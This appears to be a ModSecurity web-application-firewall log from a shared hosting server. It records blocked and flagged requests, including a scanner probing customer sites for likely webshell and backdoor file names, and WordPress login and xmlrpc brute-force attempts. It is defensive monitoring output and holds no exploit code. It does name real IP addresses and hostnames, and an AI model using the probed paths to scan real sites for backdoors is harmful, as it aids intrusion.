[Tue May 26 16:50:10.144483 2026] [security2:error] [pid 817651:tid 817798] [client 20.206.111.149:28222] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWB6tlGRCPPN1dS2y2-fQAAAJY"]
[Tue May 26 16:50:10.168532 2026] [security2:error] [pid 823496:tid 823688] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6pa08mrtyBNpA4PgDwAAADw"]
[Tue May 26 16:50:10.378578 2026] [security2:error] [pid 823496:tid 823745] [client 5.255.99.53:39914] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6pa08mrtyBNpA4PgEAAAAHU"]
[Tue May 26 16:50:10.381987 2026] [security2:error] [pid 817651:tid 817828] [client 5.255.99.53:40144] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6tlGRCPPN1dS2y2-fgAAALQ"]
[Tue May 26 16:50:10.386775 2026] [security2:error] [pid 823496:tid 823700] [client 5.255.99.53:40006] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6pa08mrtyBNpA4PgEQAAAEg"]
[Tue May 26 16:50:10.470035 2026] [security2:error] [pid 823496:tid 823714] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6pa08mrtyBNpA4PgFgAAAFY"]
[Tue May 26 16:50:10.551240 2026] [security2:error] [pid 823496:tid 823651] [client 5.255.99.53:40018] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6pa08mrtyBNpA4PgGQAAABc"]
[Tue May 26 16:50:10.555297 2026] [security2:error] [pid 817651:tid 817844] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6tlGRCPPN1dS2y2-ggAAAMQ"]
[Tue May 26 16:50:10.569357 2026] [security2:error] [pid 823496:tid 823698] [client 5.255.99.53:40074] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6pa08mrtyBNpA4PgHgAAAEY"]
[Tue May 26 16:50:10.571765 2026] [security2:error] [pid 817651:tid 817861] [client 5.255.99.53:40132] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6tlGRCPPN1dS2y2-gwAAANU"]
[Tue May 26 16:50:10.989849 2026] [security2:error] [pid 823496:tid 823638] [client 74.7.244.22:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "ktmadvance-senegal.com"] [uri "/robots.txt"] [unique_id "ahWB6pa08mrtyBNpA4PgIwAAAAo"]
[Tue May 26 16:50:10.990824 2026] [security2:error] [pid 817651:tid 817786] [client 74.7.244.22:46670] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "ktmadvance-senegal.com"] [uri "/robots.txt"] [unique_id "ahWB6tlGRCPPN1dS2y2-hgAAiik"]
[Tue May 26 16:50:11.079879 2026] [security2:error] [pid 817651:tid 817814] [client 74.7.244.22:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "ahWB69lGRCPPN1dS2y2-igAAAKY"], referer: https://ktmadvance-senegal.com/robots.txt
[Tue May 26 16:50:11.080571 2026] [security2:error] [pid 817651:tid 817851] [client 74.7.244.22:46670] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "ahWB69lGRCPPN1dS2y2-iQAAy1A"], referer: https://ktmadvance-senegal.com/robots.txt
[Tue May 26 16:50:11.231646 2026] [security2:error] [pid 817651:tid 817849] [client 20.206.111.149:39129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/ff.php"] [unique_id "ahWB69lGRCPPN1dS2y2-mgAAAMk"]
[Tue May 26 16:50:11.231759 2026] [security2:error] [pid 817651:tid 817849] [client 20.206.111.149:39129] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/ff.php"] [unique_id "ahWB69lGRCPPN1dS2y2-mgAAAMk"]
[Tue May 26 16:50:11.272578 2026] [security2:error] [pid 817651:tid 817801] [client 5.255.99.53:40132] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB69lGRCPPN1dS2y2-kAAAAJk"]
[Tue May 26 16:50:11.275912 2026] [security2:error] [pid 817651:tid 817842] [client 5.255.99.53:39890] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB69lGRCPPN1dS2y2-kQAAAMI"]
[Tue May 26 16:50:11.276215 2026] [security2:error] [pid 823496:tid 823750] [client 5.255.99.53:40018] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB65a08mrtyBNpA4PgKgAAAHo"]
[Tue May 26 16:50:11.289596 2026] [security2:error] [pid 823496:tid 823641] [client 5.255.99.53:40096] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB65a08mrtyBNpA4PgLgAAAA0"]
[Tue May 26 16:50:11.291682 2026] [security2:error] [pid 823496:tid 823703] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB65a08mrtyBNpA4PgNgAAAEs"]
[Tue May 26 16:50:11.295596 2026] [security2:error] [pid 817651:tid 817882] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB69lGRCPPN1dS2y2-lgAAAOo"]
[Tue May 26 16:50:11.295619 2026] [security2:error] [pid 823496:tid 823727] [client 5.255.99.53:40074] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB65a08mrtyBNpA4PgMAAAAGM"]
[Tue May 26 16:50:11.297693 2026] [security2:error] [pid 817651:tid 817820] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB69lGRCPPN1dS2y2-mAAAAKw"]
[Tue May 26 16:50:11.297757 2026] [security2:error] [pid 823496:tid 823635] [client 5.255.99.53:40102] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB65a08mrtyBNpA4PgLQAAAAc"]
[Tue May 26 16:50:11.299029 2026] [security2:error] [pid 823496:tid 823636] [client 5.255.99.53:40006] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB65a08mrtyBNpA4PgNQAAAAg"]
[Tue May 26 16:50:11.299132 2026] [security2:error] [pid 817651:tid 817876] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB69lGRCPPN1dS2y2-lQAAAOQ"]
[Tue May 26 16:50:11.305863 2026] [security2:error] [pid 817651:tid 817893] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB69lGRCPPN1dS2y2-mQAAAPU"]
[Tue May 26 16:50:11.308376 2026] [security2:error] [pid 817651:tid 817818] [client 5.255.99.53:40144] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB69lGRCPPN1dS2y2-kgAAAKo"]
[Tue May 26 16:50:11.908389 2026] [security2:error] [pid 823496:tid 823737] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB6pa08mrtyBNpA4PgHQAAAG0"]
[Tue May 26 16:50:11.957889 2026] [security2:error] [pid 817651:tid 817840] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB69lGRCPPN1dS2y2-oAAAAMA"]
[Tue May 26 16:50:11.958666 2026] [security2:error] [pid 823496:tid 823734] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB65a08mrtyBNpA4PgRAAAAGo"]
[Tue May 26 16:50:11.974889 2026] [security2:error] [pid 823496:tid 823702] [client 5.255.99.53:40408] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB65a08mrtyBNpA4PgRQAAAEo"]
[Tue May 26 16:50:12.032807 2026] [security2:error] [pid 823496:tid 823715] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB65a08mrtyBNpA4PgSgAAAFc"]
[Tue May 26 16:50:12.053097 2026] [security2:error] [pid 823496:tid 823672] [client 5.255.99.53:40018] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB65a08mrtyBNpA4PgSwAAACw"]
[Tue May 26 16:50:12.056955 2026] [security2:error] [pid 817651:tid 817838] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB69lGRCPPN1dS2y2-pAAAAL4"]
[Tue May 26 16:50:12.063093 2026] [security2:error] [pid 823496:tid 823708] [client 5.255.99.53:40102] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB7Ja08mrtyBNpA4PgTgAAAFA"]
[Tue May 26 16:50:12.063117 2026] [security2:error] [pid 823496:tid 823709] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB7Ja08mrtyBNpA4PgTQAAAFE"]
[Tue May 26 16:50:12.065673 2026] [security2:error] [pid 823496:tid 823658] [client 5.255.99.53:39914] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB7Ja08mrtyBNpA4PgUgAAAB4"]
[Tue May 26 16:50:12.065698 2026] [security2:error] [pid 823496:tid 823681] [client 5.255.99.53:40046] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB7Ja08mrtyBNpA4PgTwAAADU"]
[Tue May 26 16:50:12.069196 2026] [security2:error] [pid 817651:tid 817879] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB7NlGRCPPN1dS2y2-pQAAAOc"]
[Tue May 26 16:50:12.071359 2026] [security2:error] [pid 823496:tid 823752] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB7Ja08mrtyBNpA4PgVQAAAHw"]
[Tue May 26 16:50:12.080251 2026] [security2:error] [pid 823496:tid 823712] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB7Ja08mrtyBNpA4PgVwAAAFQ"]
[Tue May 26 16:50:12.093485 2026] [security2:error] [pid 817651:tid 817885] [client 20.206.111.149:36496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWB7NlGRCPPN1dS2y2-pwAAAO0"]
[Tue May 26 16:50:12.093582 2026] [security2:error] [pid 817651:tid 817885] [client 20.206.111.149:36496] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWB7NlGRCPPN1dS2y2-pwAAAO0"]
[Tue May 26 16:50:13.063828 2026] [security2:error] [pid 817651:tid 817793] [client 117.198.37.168:53269] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWB7NlGRCPPN1dS2y2-twAAAJE"]
[Tue May 26 16:50:13.063987 2026] [security2:error] [pid 817651:tid 817793] [client 117.198.37.168:53269] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWB7NlGRCPPN1dS2y2-twAAAJE"]
[Tue May 26 16:50:13.156786 2026] [security2:error] [pid 823496:tid 823648] [client 114.119.139.172:50911] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ucdc.co.in"] [uri "/upload/omr/520190589.pdf"] [unique_id "ahWB7Za08mrtyBNpA4PgYgAAABQ"], referer: https://www.ucdc.co.in/upload/omr
[Tue May 26 16:50:13.451352 2026] [security2:error] [pid 817651:tid 817785] [client 20.206.111.149:35278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWB7dlGRCPPN1dS2y2-uwAAAIk"]
[Tue May 26 16:50:13.451461 2026] [security2:error] [pid 817651:tid 817785] [client 20.206.111.149:35278] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWB7dlGRCPPN1dS2y2-uwAAAIk"]
[Tue May 26 16:50:13.836324 2026] [security2:error] [pid 823496:tid 823668] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB7Ja08mrtyBNpA4PgWQAAACg"]
[Tue May 26 16:50:14.006649 2026] [security2:error] [pid 823496:tid 823629] [client 178.20.43.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWB7Za08mrtyBNpA4PgaQAAAAE"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1419348&moderation-hash=7dbb62ec6009b8fd57931c4968ce2f90
[Tue May 26 16:50:14.888614 2026] [security2:error] [pid 817651:tid 817861] [client 178.20.43.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWB7tlGRCPPN1dS2y2-yQAAANU"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1419348&moderation-hash=7dbb62ec6009b8fd57931c4968ce2f90
[Tue May 26 16:50:15.392869 2026] [security2:error] [pid 823496:tid 823662] [client 20.206.111.149:37812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-block.php"] [unique_id "ahWB75a08mrtyBNpA4PgfgAAACI"]
[Tue May 26 16:50:15.392957 2026] [security2:error] [pid 823496:tid 823662] [client 20.206.111.149:37812] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-block.php"] [unique_id "ahWB75a08mrtyBNpA4PgfgAAACI"]
[Tue May 26 16:50:15.685760 2026] [security2:error] [pid 817651:tid 817807] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB7tlGRCPPN1dS2y2-xAAAAJ8"]
[Tue May 26 16:50:16.054395 2026] [security2:error] [pid 823496:tid 823678] [client 178.20.43.173:64574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 173.43.20.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWB75a08mrtyBNpA4PghgAAADI"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 16:50:16.880547 2026] [security2:error] [pid 823496:tid 823717] [client 178.20.43.173:65214] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "178.20.43.173" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWB8Ja08mrtyBNpA4PgjgAAAFk"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 16:50:16.882976 2026] [security2:error] [pid 823496:tid 823697] [client 20.206.111.149:2627] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-der.php"] [unique_id "ahWB8Ja08mrtyBNpA4PgjwAAAEU"]
[Tue May 26 16:50:16.883043 2026] [security2:error] [pid 823496:tid 823697] [client 20.206.111.149:2627] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-der.php"] [unique_id "ahWB8Ja08mrtyBNpA4PgjwAAAEU"]
[Tue May 26 16:50:17.436231 2026] [security2:error] [pid 817651:tid 817879] [client 20.206.111.149:30617] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/ah25.php"] [unique_id "ahWB8dlGRCPPN1dS2y2-4AAAAOc"]
[Tue May 26 16:50:17.436376 2026] [security2:error] [pid 817651:tid 817879] [client 20.206.111.149:30617] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/ah25.php"] [unique_id "ahWB8dlGRCPPN1dS2y2-4AAAAOc"]
[Tue May 26 16:50:17.827635 2026] [security2:error] [pid 823496:tid 823633] [client 20.206.111.149:64390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahWB8Za08mrtyBNpA4PgngAAAAU"]
[Tue May 26 16:50:17.827759 2026] [security2:error] [pid 823496:tid 823633] [client 20.206.111.149:64390] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahWB8Za08mrtyBNpA4PgngAAAAU"]
[Tue May 26 16:50:18.254255 2026] [security2:error] [pid 823496:tid 823715] [client 20.206.111.149:2904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWB8pa08mrtyBNpA4PgqAAAAFc"]
[Tue May 26 16:50:18.254371 2026] [security2:error] [pid 823496:tid 823715] [client 20.206.111.149:2904] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWB8pa08mrtyBNpA4PgqAAAAFc"]
